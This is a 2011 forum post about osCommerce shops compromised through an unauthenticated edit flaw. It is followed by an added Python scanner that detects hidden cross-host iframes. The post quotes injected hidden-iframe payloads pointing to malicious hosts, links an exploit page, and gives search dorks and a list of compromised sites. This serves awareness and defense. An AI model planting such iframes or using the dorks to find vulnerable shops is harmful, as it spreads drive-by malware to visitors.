Hmm.. this makes me think about Gumblar.
The reason for all of this is probably a 0-day found on July 10th, 2011 for the open-source software "osCommerce." Apparently, you can edit the site info without being logged in. This means you can add JavaScript. The exploit, which is nothing more than a clue, can be found here:
http://www.1337day.com/exploits/16505.
I put the URL leading to the exploit here because the site is known to blackhats, and webserver admins can make better security stages and create workarounds.
Something you can try is making the URL:
not accessible from the outside.
For example, hxxp://www.bikes4less.nl/catalog/ (visiting is at your own risk!) shows that the website got cracked earlier with, probably, the same exploit:
Code:
<title>Hacked By Tn Mahdi Sad Hacker<iframe src='http://willysy.com/images/banners/'
style='position:absolute;visibility:hidden'></iframe></title>
By the way, the rest of the webpage is not really good anymore, lol.
Anyway, here's a talk about it. The Dutch version, the original, was also posted to the security.nl boards on Tuesday.
http://blog.armorize.com/2011/07/willys ... on-ongoing reports a flood of compromised websites that upload malware. (source: http://threatpost.com/en_us/blogs/massi ... ges-072611)
Visiting such a compromised website with a PC which doesn't have the latest security updates installed (web browser, operating system, Java, Adobe Leaker, Adobe Flash, QuickTime and plug-ins) is enough to have your computer get classified "compromised."
Searching with the dork "src=http://exero.eu" site:.nl was enough to find the amount of Dutch websites (sometimes only certain pages of the following) that were compromised. Google only warns for some of the following websites though: (this is from Tuesday)
A part of the above websites allow you to pay with a credit card...
The following websites/pages were, according to Google, compromised, but are likely to be fixed right now:
hxxp://www.bodyflower.nl/winkel/
hxxp://www.europacker.nl/shop/
hxxp://www.morgenisnu.nl/shop/eldiolie495ml-p-397.html
You can recognize infected pages by looking at their source. You will see something like the following:
Code:
<title>Innologic</title><iframe src='http://exero.eu/catalog/css.htm' style='position:absolute;visibility:hidden'></iframe><title></title>
Searching with the dork "http://willysy.com/images/banners/" site:.nl will give you results with partly the same websites.
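The source check described above, as an added example that is not part of the original post: a Python scanner that flags iframes which load from another host and are either styled invisible or sit inside <title>. The function names, the regexes and the clean sample are assumptions of this example; the two infected samples are the snippets quoted in the post.

```python
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""")
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
TITLE_RE = re.compile(r"<title\b[^>]*>(.*?)</title\s*>", re.I | re.S)

# The two infected snippets quoted in the post.
SAMPLE_IN_TITLE = (
    "<title>Hacked By Tn Mahdi Sad Hacker<iframe src='http://willysy.com/images/banners/'\n"
    "style='position:absolute;visibility:hidden'></iframe></title>"
)
SAMPLE_AFTER_TITLE = (
    "<title>Innologic</title><iframe src='http://exero.eu/catalog/css.htm' "
    "style='position:absolute;visibility:hidden'></iframe><title></title>"
)
# Constructed clean page: a visible third-party embed and a hidden same-site frame.
SAMPLE_CLEAN = (
    '<title>Shop</title><iframe src="https://video.example/embed/1" width="560"></iframe>'
    '<iframe src="/cart.php" style="display:none"></iframe>'
)

def parse_attrs(raw):
    """Turn the attribute text of one tag into a dict (names lower-cased)."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(raw)}

def find_hidden_iframes(html, site_host):
    """Flag iframes that load from another host and are invisible or inside <title>."""
    title_spans = [m.span(1) for m in TITLE_RE.finditer(html)]
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        hidden = bool(HIDDEN_RE.search(attrs.get("style", "")))
        in_title = any(s <= m.start() < e for s, e in title_spans)
        if host and host != site_host.lower() and (hidden or in_title):
            findings.append({"src": src, "host": host, "hidden": hidden, "in_title": in_title})
    return findings

if __name__ == "__main__":
    for name, page, host in [("in-title", SAMPLE_IN_TITLE, "www.bikes4less.nl"),
                             ("after-title", SAMPLE_AFTER_TITLE, "innologic.nl"),
                             ("clean", SAMPLE_CLEAN, "shop.example")]:
        print(name, find_hidden_iframes(page, host))
```

The scan works on raw source rather than a parsed DOM, so it reports the frame whether it was injected inside the title element or directly after it.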